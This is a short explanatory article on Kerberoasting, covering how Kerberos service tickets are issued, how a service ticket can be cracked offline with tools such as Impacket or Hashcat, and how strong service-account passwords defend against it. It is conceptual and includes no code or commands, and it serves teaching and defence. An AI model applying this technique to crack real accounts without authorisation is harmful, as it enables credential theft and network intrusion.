Kerberoasting

Credit to Tim Medin for his DerbyCon presentation on this technique.

The Kerberoasting technique provides an attacker with a means to perform offline password cracking of network service accounts. Successful exploitation is most often reliant upon the target account having an insecure password.

Kerberos Authentication

Kerberos authentication involves series of requests between a client, Key Distribution Center (KDC), and server. Throughout this process, encryption is employed on specific segments of the request. Encryption keys are derived from relevant passwords (user, service account, or krbtgt). An rudimentary description of the process follows:

1. A encrypted value is sent to the KDC. The encryption key is affiliated with the requesting users password hash.
2. The KDC decrypts the message and replies with an encrypted Ticket Granting Ticket (TGT). This TGT value is only decryptable by the KDC.
3. The client queries the KDC for access to a network resource.
4. The KDC replies to the client with a service ticket; which is encrypted using the password of the target network service.
5. The client forwards this encrypted value to the network service.

Exploitation

The Kerberos authentication dataflow results in a client gaining access to values encrypted with the password of a network resource; see step four above. This value is subjectable to offline password cracking using Impacket, Hashcat, or other automated cracking tools. An insecure password will likely be readily identifiable.

Remediation

The most readily available defense against kerberoasting is a secure password policy for all service accounts. To monitor enforcement, network defenders can employ automated processes that attempt to proactively brute-force insecure passwords.